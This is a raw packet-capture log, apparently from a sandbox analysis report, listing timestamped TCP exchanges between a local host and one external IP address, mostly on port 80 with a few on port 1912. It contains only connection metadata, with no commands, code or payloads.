                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.106705904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.109457970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.109550953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.109627962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.112426996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.112502098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.112555981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.114388943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.114469051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.114593983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.116122007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.116190910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.116269112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.118222952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.118258953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.118552923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.120321989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.120356083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.120404005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.122275114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.122309923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.122339964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.124181986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.124260902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.124304056 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.126262903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.126296997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.126326084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.128209114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.128285885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.128962994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.130224943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.130259991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.130291939 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.132213116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.132247925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.132281065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.134217024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.134269953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.134325981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.136193991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.136205912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.136303902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.138117075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.138171911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.138293982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.140238047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.140249014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.140350103 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.142265081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.142277002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.142374039 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.144124031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.144191027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.144233942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.146133900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.146199942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.146255970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.148130894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.148200035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.148255110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.150167942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.150187016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.150226116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.152120113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.152179003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.152200937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.154264927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.154321909 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.154422998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.156116962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.156379938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.156403065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.158431053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.158488989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.158493996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.208234072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.243355036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.243427992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.243570089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.244278908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.244463921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.244545937 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.246222019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.262892008 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.270093918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.270345926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.270472050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.270657063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.270926952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.271035910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.272505999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.272517920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.272619963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.274178028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.274260998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.274310112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.275870085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.275928020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.275990009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.277615070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.277626991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.277738094 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.279246092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.279301882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.279352903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.280973911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.280983925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.281075954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.282560110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.282655954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.282736063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.284162045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.284301996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.284362078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.285904884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.285928965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.286015034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.287374973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.287508965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.287621021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.289102077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.289112091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.289205074 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.290657997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.290747881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.291059017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.292359114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.292368889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.292462111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.293931961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.294049025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.294157982 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.295512915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.295567989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.295598984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.297207117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.297230959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.297348022 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.298727036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.298886061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.299000978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.300420046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.300478935 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.300502062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.302144051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.302153111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.302264929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.303621054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.303668976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.303783894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.305239916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.305447102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.305493116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.306931019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.306941032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.306979895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.308553934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.308584929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.308635950 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.310261011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.310271978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.310381889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.311724901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.311913013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.311963081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.312304974 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.313324928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.313486099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.313535929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.314969063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.315098047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.315386057 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.316667080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.316694021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.316840887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.318248034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.318309069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.318378925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.319931984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.319960117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.320007086 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.321471930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.321516991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.321563959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.323201895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.323213100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.323259115 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.324723959 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.324847937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.324891090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.326417923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.326427937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.326459885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.327970028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.328011990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.328041077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.329678059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.329688072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.329730988 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.331229925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.331331968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.331353903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.332849979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.332961082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.332972050 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.334475994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.334727049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.334814072 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.336200953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.336211920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.336245060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.337681055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.337915897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.338000059 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.339351892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.339416981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.339418888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.341119051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.341129065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.341223001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.342585087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.342628002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.342751980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.344182014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.344294071 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.344399929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.345782995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.345933914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.346045017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.347646952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.347686052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.347835064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.349167109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.349175930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.349220037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.350658894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.350693941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.350838900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.396965027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.432029963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.462181091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.462374926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.462507010 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.462826014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.463249922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.463270903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.463308096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.464510918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.464550018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.464580059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.465814114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.465991020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.466094017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.467202902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.467215061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.467240095 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.468460083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.468496084 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.468513012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.469753981 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.470020056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.470118999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.471100092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.471136093 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.471215010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.472371101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.472496033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.472533941 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.473684072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.473695993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.473819971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.474960089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.474996090 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.475075960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.476185083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:11.476258993 CET8049708185.81.68.147192.168.2.5
